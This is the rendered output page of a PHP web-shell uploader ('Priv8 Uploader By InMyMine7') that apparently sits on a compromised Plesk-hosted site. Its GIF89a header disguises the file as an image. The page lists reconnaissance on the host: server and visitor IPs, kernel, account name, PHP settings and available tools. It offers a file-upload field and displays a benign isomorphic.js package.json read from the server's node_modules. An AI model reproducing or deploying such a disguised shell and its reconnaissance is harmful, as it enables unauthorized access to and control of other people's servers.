GIF89a;
GIF89a;Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
| Server IP : 82.165.91.112 / Your IP : 216.73.217.79 Web Server : Apache System : Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64 User : nr7.net_tfpqq467gv ( 10001) PHP Version : 8.4.24 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/nr7.net/emdash.nr7.net/node_modules/isomorphic.js/ |
Upload File : |
{
"name": "isomorphic.js",
"version": "0.2.5",
"description": "Isomorphic JavaScript helper functions (performance, crpyto, ..)",
"sideEffects": false,
"main": "./iso.js",
"browser": "./browser.mjs",
"unpkg": "./browser.mjs",
"module": "./browser.mjs",
"exports": {
".": {
"node": {
"import": "./node.mjs",
"require": "./iso.js"
},
"browser": {
"import": "./browser.mjs",
"require": "./browser.js"
},
"default": {
"import": "./browser.mjs",
"require": "./iso.js"
}
},
"./package.json": "./package.json"
},
"dependencies": {},
"funding": {
"type": "GitHub Sponsors ❤",
"url": "https://github.com/sponsors/dmonad"
},
"devDependencies": {
"@types/node": "^13.13.9",
"standard": "^14.3.4",
"typescript": "^3.9.3"
},
"scripts": {
"test": "npm run lint",
"lint": "standard && tsc",
"preversion": "npm run test"
},
"files": [
"browser.js",
"browser.mjs",
"iso.js",
"node.js",
"node.mjs"
],
"repository": {
"type": "git",
"url": "git+https://github.com/dmonad/isomorphic.js.git"
},
"author": "Kevin Jahns <kevin.jahns@protonmail.com>",
"license": "MIT",
"bugs": {
"url": "https://github.com/dmonad/isomorphic.js/issues"
},
"homepage": "https://github.com/dmonad/isomorphic.js#readme",
"standard": {
"ignore": [
"/dist",
"/node_modules",
"/docs"
]
}
}